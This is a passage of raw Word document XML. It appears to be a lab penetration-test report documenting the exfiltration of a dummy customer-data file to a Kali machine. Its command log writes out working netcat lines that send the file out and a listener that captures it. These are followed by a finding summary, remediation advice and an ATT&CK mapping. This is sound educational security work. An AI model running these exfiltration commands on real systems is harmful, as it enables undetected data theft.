    </w:p>
    <w:p w14:paraId="1A4D9605" w14:textId="5292C5CA" w:rsidR="00E501C8" w:rsidRDefault="00B13552">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 Connection Confirmed on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D810753" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00CC60C9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The moment the send command ran on the target, the Kali listener terminal updated to show:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A02C166" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00CC60C9"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rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>connect to [192.168.100.10] from (UNKNOWN) [192.168.100.20] 39099</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C237C3" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00CC60C9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This line confirms the target (192.168.100.20) successfully connected to Kali (192.168.100.10) and transferred data. The listener then automatically exited once the connection closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E223EF" w14:textId="0F93A384" w:rsidR="00E501C8" w:rsidRDefault="00B13552">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>2.5 Confirm File Arrived on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55895779" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>After the listener exited, the received file was read to confirm its contents arrived intact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ED9A05" w14:textId="77777777" w:rsidR="00E501C8"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rPr>
        <w:t>cat stolen_data.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063A7C39" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Expected output (confirming successful exfiltration):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBC5859" w14:textId="77777777" w:rsidR="00E501C8"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rPr>
        <w:t>Confidential: Customers SSN and CC numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3096064E" w14:textId="1FAD34CA" w:rsidR="00E501C8" w:rsidRDefault="00B13552">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>3. Full Command Log (in Order)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067CAC1E" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>On the target machine (root shell):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E39CD6" w14:textId="77777777" w:rsidR="00E501C8"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rPr>
        <w:t># Step 1 - Create dummy sensitive file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>echo "Confidential: Customers SSN and CC numbers" &gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>/secret.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t># Step 2 - Verify file exists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>ls /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>/secret.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>/secret.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t># Step 3 - Send file to Kali listener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>nc 192.168.100.10 5555 &lt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>/secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E19682" w14:textId="77777777" w:rsidR="00CC60C9" w:rsidRDefault="00CC60C9">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16656C8A" w14:textId="77777777" w:rsidR="00CC60C9" w:rsidRDefault="00CC60C9">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7204C8CE" w14:textId="1057E128" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>On Kali attacker machine (separate terminal):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C988BD6" w14:textId="77777777" w:rsidR="00E501C8"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rPr>
        <w:t># Step 1 - Start listener BEFORE sending (this must run first)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5555 &gt; stolen_data.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t># Step 2 - After connection closes, confirm file arrived</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>cat stolen_data.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D72F97" w14:textId="3B9E7312" w:rsidR="00B13552" w:rsidRDefault="00B13552">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40A7ADB3" wp14:editId="643CD036">
            <wp:extent cx="4762500" cy="2647192"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="73053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89169" cy="2662016"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F77CB62" w14:textId="16804A66" w:rsidR="00B13552" w:rsidRDefault="00B13552">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="742B1740" wp14:editId="3856CCD0">
            <wp:extent cx="4989984" cy="2399030"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
            <wp:docPr id="1220746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27232" cy="2416938"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4339541A" w14:textId="097BACC9" w:rsidR="00E501C8" w:rsidRDefault="00B13552">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Finding Summary </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095C4E9A" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability: Undetected Data Exfiltration via Raw TCP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354025AA" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F1BBAD" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00CC60C9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Following successful privilege escalation to root, a sensitive file containing simulated customer PII (personally identifiable information) was exfiltrated from the target machine to the attacker's machine using a raw </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP connection on port 5555. The transfer completed successfully without triggering any alerts, firewall rules, or detection mechanisms. No encryption or obfuscation was used — the data was sent as plain text — yet it still went completely undetected, highlighting the absence of network monitoring and data loss prevention controls on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB9E2A4" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3238A517" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Complete theft of simulated sensitive customer data (SSNs, credit card numbers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42223268" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Transfer occurred silently — no logs, no alerts, no detection triggered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F48B76" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Demonstrates that root-level access enables unrestricted data theft from any location on the filesystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2496F2E1" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In a real environment, this would constitute a notifiable data breach under regulations such as GDPR, PCI-DSS, and HIPAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF06061" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Root Cause:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AE3D63" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No outbound network monitoring or alerting on non-standard ports (5555)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C75B1C4" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No Data Loss Prevention (DLP) system to detect or block sensitive data leaving the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A318BE3" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Root-level access (achieved via SUID </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) removed all filesystem access controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D05B95" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No network segmentation preventing the target web server from making arbitrary outbound connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09562DFC" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2EE1A1" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Implement network monitoring with alerts for unexpected outbound connections, especially on non-standard ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0392C977" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Deploy a Data Loss Prevention (DLP) solution to detect and block sensitive data being transmitted outside the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314783E4" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apply network segmentation — web servers should not be able to initiate arbitrary outbound TCP connections to other machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9B9B5F" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix the upstream vulnerabilities (SQL injection, command execution, SUID </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) that made this stage reachable in the first place</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E1AAEC" w14:textId="451B0334" w:rsidR="00B13552" w:rsidRPr="00B13552" w:rsidRDefault="00000000" w:rsidP="00B13552">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enforce egress filtering on the firewall — only allow outbound traffic on expected ports (80, 443, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6A5D93" w14:textId="78A856D8" w:rsidR="00E501C8" w:rsidRDefault="00B13552">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>5. MITRE ATT&amp;CK Mapping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600"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E501C8" w14:paraId="68042B53" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="4A949D21" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>What Happened</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="425CD4D4" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>ATT&amp;CK Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="7E5D9AAF" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E501C8" w14:paraId="19407826" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02FF03D2" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Sensitive file read from filesystem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C423BA6" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Data from Local System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63F71729" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>T1005</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E501C8" w14:paraId="087D0C00" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="594E0273" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
